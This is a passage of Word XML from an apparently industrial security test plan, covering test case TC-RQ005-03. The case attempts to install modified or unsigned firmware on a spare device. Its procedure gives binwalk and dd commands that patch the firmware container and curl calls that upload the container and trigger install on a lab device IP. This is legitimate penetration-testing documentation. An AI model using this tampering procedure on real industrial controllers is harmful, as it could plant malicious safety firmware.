    <w:p w14:paraId="68A10089" w14:textId="29C0F49D" w:rsidR="00FE6490" w:rsidRPr="006868A2" w:rsidRDefault="00FE6490" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ005-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unsigned / Modified Firmware Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AAAC3" w14:textId="34ACEA30" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC6">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CA0CC6" w14:paraId="6DA75CB8"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F5AAB9" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A3314D" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6"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CA0CC6" w14:paraId="0EFC904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9CE186" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4584B40F" w14:textId="6DEE48BF" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="001369AA"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1369AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ005-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="001604A0" w14:paraId="6166C15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A3690D7" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A5F3450" w14:textId="4B57616E" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00A635F8"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A635F8">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-005 → EDR 3.10 / EDR 3.14 (/ EDR 3.12-3.13) → Asset D, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00D67CA6" w14:paraId="7B3B4B8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E143678" w14:textId="02695819" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287A69D8" w14:textId="538A6F30" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00A635F8"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Tampering + Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w14:paraId="2DB565F6"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CCE3006" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D151AE3" w14:textId="38604EA0" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00A635F8"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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="72E547B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154CA2" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0329BA86" w14:textId="1E1E813B" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00FA33BE"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FA33BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the firmware-update mechanism installs an update without cryptographic authenticity/integrity verification: a modified/unsigned firmware BLOB is accepted for installation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA33BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> proving the intentional-corruption protection for the safety firmware is absent (only an environmental firewall assumption and, as authorization, the RQ-011 physical gate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA33BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> stand between an attacker and a malicious image).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="4A2F84A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60FD6205" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3777ECE2" w14:textId="77777777" w:rsidR="00DB376E" w:rsidRDefault="00DB376E"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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB376E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. Place the (spare) DUT in Update state*(operational precondition; the gate's authorization is tested under RQ-011)*. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D1EC15" w14:textId="77777777" w:rsidR="00DB376E" w:rsidRDefault="00DB376E"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B376E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Take a legitimate update container and modify a byte (or strip/forge any signature/header).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E8D50B" w14:textId="77777777" w:rsidR="00DB376E" w:rsidRDefault="00DB376E"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B376E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. Upload via the IoT-Core /firmware/container BLOB service and invoke /firmware/install.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A63441" w14:textId="1A5A9A94" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00DB376E"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B376E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. Observe whether the device verifies the image before install (rejects) or proceeds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="0460A19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01730F" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="784D65C5" w14:textId="77777777" w:rsidR="009D17DC" w:rsidRDefault="009D17DC"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9D17DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS against the requirement iff the modified/unsigned image is rejected by a signature/integrity check before install. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA7BF3E" w14:textId="14B4D49E" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="009D17DC"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9D17DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = ACCEPTED for install → confirms EDR 3.10/3.14 unmet (G-2); recorded as a FAIL against RQ-005 for the firmware asset. Safety: spare DUT only; re-flash a validated image afterward.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A23DF45" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRPr="00AF57B2" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D392380" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC6">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CA0CC6" w14:paraId="6EC7E2B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139947" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEBFFF9" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6"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CA0CC6" w14:paraId="7BA681D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51C95F" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA70639" w14:textId="31FA746D" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00E9651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E96514">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ005-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="5CD87AF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DCFD35F" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B506ED1" w14:textId="77777777" w:rsidR="00B92C40" w:rsidRDefault="00B92C40" w:rsidP="00B92C4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92C40">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Spare SRIO DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A735639" w14:textId="77777777" w:rsidR="00B92C40" w:rsidRDefault="00B92C40" w:rsidP="00B92C4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92C40">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Pi mgmt eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68ECBB40" w14:textId="77B80A62" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00B92C40" w:rsidP="00B92C4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92C40">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="18728C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31599" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439078AE" w14:textId="7B2250C8" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00E11CDF" w:rsidP="00E11CDF">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E11CDF">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl to IoT-Core firmware profile; hex editor / binwalk (OWASP FSTM) to inspect &amp; modify container; Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00FD6890" w14:paraId="6513920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D9207F1" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5710990E"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 TC-RQ005-03 Attempt install of a modified/unsigned firmware container (spare DUT only)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CC920B"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 0) Device in Update state (operational precondition; authorization of the gate = RQ-011)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0B6F4F"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 1) Inspect the legitimate container for any signature/header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABA1631"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binwalk -E fw_container.bin ; binwalk fw_container.bin | tee TC0503_hdr.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF25699"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 2) Modify one byte (or blank a putative signature region)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF13501"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cp fw_container.bin fw_mod.bin ; printf '\x00' | dd of=fw_mod.bin bs=1 seek=4096 conv=notrunc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568B1FEF"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 3) Upload via IoT-Core BLOB service (chunked) and trigger install</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3254F2FC"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curl -s http://192.168.0.2/firmware/container/start_stream_set</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFA7B3E"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 ...chunked stream_set of fw_mod.bin per container/chunksize...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6647A1B5" w14:textId="47570796" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6"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curl -s -X POST http://192.168.0.2/firmware/install # observe accept vs. signature-reject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="1A97F6C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D5878F" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CBE4634" w14:textId="1E76E7F6" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="000B7D5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B7D52">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Container is an unsigned BLOB (SRIO-2953); no signature-verification step → modified image accepted for install (device reboots to apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00AD4B09" w14:paraId="0FB7D5A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2E331D8" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70FC077A" w14:textId="2A82AF50" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="009A6369"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Modified image accepted/ Rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="00316EA1" w14:paraId="2C163CC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8B09CF" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630403E4" w14:textId="0B877151" w:rsidR="00CA0CC6" w:rsidRPr="00CA0CC6" w:rsidRDefault="00CB2E2F"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CB2E2F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0503_hdr.txt, upload/install PCAP, LED sequence photo, post-install version read; re-flash log with validated image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="547D6517" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8B8F0E" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4574AC04" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D36A6D4" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3242ABE2" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2794A151" w14:textId="11E8FD1B" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD6896"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0FE36057" w14:textId="3D7D7740" w:rsidR="0024048B" w:rsidRPr="0024048B" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3B117" w14:textId="7010E39C" w:rsidR="0024048B" w:rsidRPr="0024048B" w:rsidRDefault="0024048B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024048B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall identify the software installed on it that is necessary for safe operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD7DC5" w14:textId="15286306" w:rsidR="0024048B" w:rsidRPr="0024048B" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C76F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BD72A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 4.1,</w:t>
      </w:r>
      <w:r w:rsidR="006C76F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BD72A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
